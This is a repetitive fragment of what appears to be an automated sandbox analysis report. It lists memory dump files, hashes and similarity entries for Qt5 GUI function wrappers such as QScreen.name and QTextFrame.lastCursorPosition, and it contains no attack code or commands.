                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?font@Font@@Item@@Textmalloc
                                                                                                                                                                                                                • String ID: QTextItem$font$font(self) -> QFont
                                                                                                                                                                                                                • API String ID: 2671846617-3637501433
                                                                                                                                                                                                                • Opcode ID: 381055a806b463bbe28e715f80afa58fb67c021fa57ae412a2c41cb20e192a4a
                                                                                                                                                                                                                • Instruction ID: 5a379b79ee3cef3c252bd368757a1b870fed6d26044c6ac18a85450e35a61fb3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 381055a806b463bbe28e715f80afa58fb67c021fa57ae412a2c41cb20e192a4a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21111BB5B08A46C1EB10DF75E8986A933A8FB95B84FA140B6CD4D17320CF7DE549C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?version@QSurfaceFormat@@QEBA?AU?$QPair@HH@@XZ.QT5GUI ref: 00007FFB9A329C38
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?version@Format@@Pair@Surfacemalloc
                                                                                                                                                                                                                • String ID: QSurfaceFormat$version$version(self) -> Tuple[int, int]
                                                                                                                                                                                                                • API String ID: 746091024-3854954085
                                                                                                                                                                                                                • Opcode ID: ddb217ff52f55257a8aecab5a762428cc64df08e392af8f26ac18f1df8d43aa9
                                                                                                                                                                                                                • Instruction ID: 96c0928f14e97aed5a6f1fc56d0d8c81b7c1b41cb064075aba8b708c10fd5c4c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ddb217ff52f55257a8aecab5a762428cc64df08e392af8f26ac18f1df8d43aa9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 981135B5A08B4681EB20CB75E8586A933A8FB95B84FA180B6CE0D03320DF7CE549C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?end@QTextBlock@@QEBA?AViterator@1@XZ.QT5GUI ref: 00007FFB9A33DC28
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?end@Block@@TextViterator@1@malloc
                                                                                                                                                                                                                • String ID: QTextBlock$end$end(self) -> QTextBlock.iterator
                                                                                                                                                                                                                • API String ID: 947878495-50235508
                                                                                                                                                                                                                • Opcode ID: 859c69c65888e48bd8124ba8445ffbc02f164d2bfe1870fd0e24e7d2d83cff90
                                                                                                                                                                                                                • Instruction ID: 9e78e20cbcfceabe72c2b51d508acee493903cf958c2ac9bbf620f5c3ebe42de
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 859c69c65888e48bd8124ba8445ffbc02f164d2bfe1870fd0e24e7d2d83cff90
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC1109B5B08A46C1EB109F75E8586A937A8FB95B84FA180B6CD0D07320CF7CD549C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?fontMetrics@QPainter@@QEBA?AVQFontMetrics@@XZ.QT5GUI ref: 00007FFB9A331CB8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?fontFontMetrics@Metrics@@Painter@@malloc
                                                                                                                                                                                                                • String ID: QPainter$fontMetrics$fontMetrics(self) -> QFontMetrics
                                                                                                                                                                                                                • API String ID: 829657008-3622236266
                                                                                                                                                                                                                • Opcode ID: 2f66e4e208b88cc98845febf2948b268b326f0505c2c14a63dbdc0e836e9933f
                                                                                                                                                                                                                • Instruction ID: 5d8967129d7c88a93becd046772dc846a91ac633cb2aa0c282fa4cf1fbaa97ca
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f66e4e208b88cc98845febf2948b268b326f0505c2c14a63dbdc0e836e9933f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C51139B5B18A4681EB10DF35E8587A933A8FB94B94FA180B6CE0D07320CF7CD549C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?name@QScreen@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FFB9A305CE8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?name@Screen@@String@@malloc
                                                                                                                                                                                                                • String ID: QScreen$name$name(self) -> str
                                                                                                                                                                                                                • API String ID: 2907677463-2722744029
                                                                                                                                                                                                                • Opcode ID: 808b6d2681690f4f992a1d679ea47f516de526880c727076be18ff47e7e6e9ca
                                                                                                                                                                                                                • Instruction ID: 903c5c24ba6928f53a6c5ce0221fefc0f16e67fd81573db47be23177a01f26e9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 808b6d2681690f4f992a1d679ea47f516de526880c727076be18ff47e7e6e9ca
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE115BB5B08A56C1EB20DF75E8586A933A8FB95B84FA140B6CD4D03320CF7CD589C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?pageBreakPolicy@QTextBlockFormat@@QEBA?AV?$QFlags@W4PageBreakFlag@QTextFormat@@@@XZ.QT5GUI ref: 00007FFB9A323C88
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: BreakText$?pageBlockFlag@Flags@Format@@Format@@@@PagePolicy@malloc
                                                                                                                                                                                                                • String ID: QTextBlockFormat$pageBreakPolicy$pageBreakPolicy(self) -> QTextFormat.PageBreakFlags
                                                                                                                                                                                                                • API String ID: 4265840606-1351799286
                                                                                                                                                                                                                • Opcode ID: 6fc666d3334ef3762203221e109850ef8c078ec5d1864fc44b63faab146de22a
                                                                                                                                                                                                                • Instruction ID: 0119d63ff00ba524330fd4844d0f5f0d53b7ade8fefc661278c48902cdb40771
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6fc666d3334ef3762203221e109850ef8c078ec5d1864fc44b63faab146de22a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50115BB5B08A46C1EB20CF75E8486A933A8FB95B84FA180B6CE0C03320DF7DD549C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?toEulerAngles@QQuaternion@@QEBA?AVQVector3D@@XZ.QT5GUI ref: 00007FFB9A35BC98
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Angles@EulerQuaternion@@Vector3malloc
                                                                                                                                                                                                                • String ID: QQuaternion$toEulerAngles$toEulerAngles(self) -> QVector3D
                                                                                                                                                                                                                • API String ID: 3712528003-2283685192
                                                                                                                                                                                                                • Opcode ID: 7e3543c64e3df37fa38a4e55f61289b1c16355f2d4c9c8dffbea9ed1da48aed5
                                                                                                                                                                                                                • Instruction ID: 02b172241a76844d5314a8e66dab86dc7c2659031a8ffe1a79a5178475cb9219
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e3543c64e3df37fa38a4e55f61289b1c16355f2d4c9c8dffbea9ed1da48aed5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E51109B5B18A46C1EB109F75E8587A937A8FB55B84FA180B6CD0D03360DF7DD54AC380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?lastCursorPosition@QTextFrame@@QEBA?AVQTextCursor@@XZ.QT5GUI ref: 00007FFB9A351C98
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Text$?lastCursorCursor@@Frame@@Position@malloc
                                                                                                                                                                                                                • String ID: QTextFrame$lastCursorPosition$lastCursorPosition(self) -> QTextCursor
                                                                                                                                                                                                                • API String ID: 2004441888-3917110963
                                                                                                                                                                                                                • Opcode ID: 6f00d1b4941bb622968369c23e364418ce4f8e0876bb36c729c5f4703fcaa84d
                                                                                                                                                                                                                • Instruction ID: 94f4c3927cb43cb0c0617c697d5901ce2be61bc0c3367db306efe087ac3ee69e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f00d1b4941bb622968369c23e364418ce4f8e0876bb36c729c5f4703fcaa84d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44115BB5B08A4681EB10DF75E8496A933A8FB59B95FA180B6CE1C43320CF7DD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?normalized@QVector4D@@QEBA?AV1@XZ.QT5GUI ref: 00007FFB9A317C98
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
